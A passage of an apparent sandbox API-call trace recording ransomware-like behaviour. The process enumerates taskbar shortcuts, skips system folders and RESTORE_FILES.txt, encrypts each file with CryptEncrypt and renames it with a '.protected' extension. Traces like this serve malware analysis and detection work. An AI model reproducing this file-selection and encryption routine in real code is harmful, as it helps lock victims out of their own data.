| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.protected") returned 146 [0090.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.protected")) returned 1 [0090.019] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Windows") returned -1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files") returned -1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Program Files (x86)") returned -1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0090.019] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="System Volume Information") returned -1 [0090.019] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.019] StrStrIW (lpFirst="Internet Explorer.lnk", lpSrch=".protected") returned 0x0 [0090.019] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.019] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.019] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.020] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".txt") returned 0x0 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.020] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".rar") returned 0x0 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 132 [0090.020] StrStrW (lpFirst="Internet Explorer.lnk", lpSrch=".zip") returned 0x0 [0090.020] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0090.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.055] 
WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x5a9, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x5a9, lpOverlapped=0x0) returned 1 [0090.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.055] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.055] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.055] CloseHandle (hObject=0x158) returned 1 [0090.056] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected") returned 142 [0090.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.protected")) returned 1 [0090.057] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.057] lstrcmpiW 
(lpString1="Mozilla Firefox.lnk", lpString2="Windows") returned -1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files") returned -1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files (x86)") returned -1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="$Recycle.bin") returned 1 [0090.057] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="System Volume Information") returned -1 [0090.057] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.057] StrStrIW (lpFirst="Mozilla Firefox.lnk", lpSrch=".protected") returned 0x0 [0090.057] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.057] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.058] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".txt") returned 0x0 [0090.058] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.058] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".rar") returned 0x0 [0090.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 130 [0090.058] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".zip") returned 0x0 [0090.058] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x491, lpOverlapped=0x0) returned 1 [0090.058] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.058] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x491, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x491, lpOverlapped=0x0) returned 1 [0090.058] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.058] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.058] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.059] CloseHandle (hObject=0x158) returned 1 [0090.059] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick 
Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.protected") returned 140 [0090.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.protected")) returned 1 [0090.060] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Windows") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Program Files") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Program Files (x86)") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="$Recycle.bin") returned 1 [0090.060] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="System Volume Information") returned 1 [0090.060] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrIW (lpFirst="Windows Explorer (2).lnk", lpSrch=".protected") returned 0x0 [0090.060] lstrcmpW (lpString1="Windows Explorer (2).lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.060] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.060] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".txt") returned 0x0 [0090.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".rar") returned 0x0 [0090.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0090.060] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".zip") returned 0x0 [0090.060] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.061] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.061] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x4cc, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.061] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.061] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.061] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.061] CloseHandle (hObject=0x158) returned 1 [0090.061] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.protected") returned 145 [0090.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.protected")) returned 1 [0090.062] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Windows") returned 1 
[0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Program Files (x86)") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="$Recycle.bin") returned 1 [0090.062] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="System Volume Information") returned 1 [0090.062] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.062] StrStrIW (lpFirst="Windows Explorer.lnk", lpSrch=".protected") returned 0x0 [0090.062] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.062] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.062] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.063] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".txt") returned 0x0 [0090.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.063] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".rar") returned 0x0 [0090.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 131 [0090.063] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".zip") returned 0x0 [0090.063] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.065] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0090.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.065] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.065] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.065] CloseHandle (hObject=0x158) returned 1 [0090.065] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows 
Explorer.lnk.protected") returned 141 [0090.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.protected")) returned 1 [0090.066] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Windows") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Program Files") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Program Files (x86)") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="$Recycle.bin") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="System Volume Information") returned 1 [0090.066] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrIW (lpFirst="Windows Media Player (2).lnk", lpSrch=".protected") returned 0x0 [0090.067] lstrcmpW (lpString1="Windows Media Player (2).lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".txt") returned 0x0 [0090.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".rar") returned 0x0 [0090.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".zip") returned 0x0 [0090.067] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.068] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.068] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, 
nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.068] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.068] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.068] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.069] CloseHandle (hObject=0x158) returned 1 [0090.069] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.protected") returned 149 [0090.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 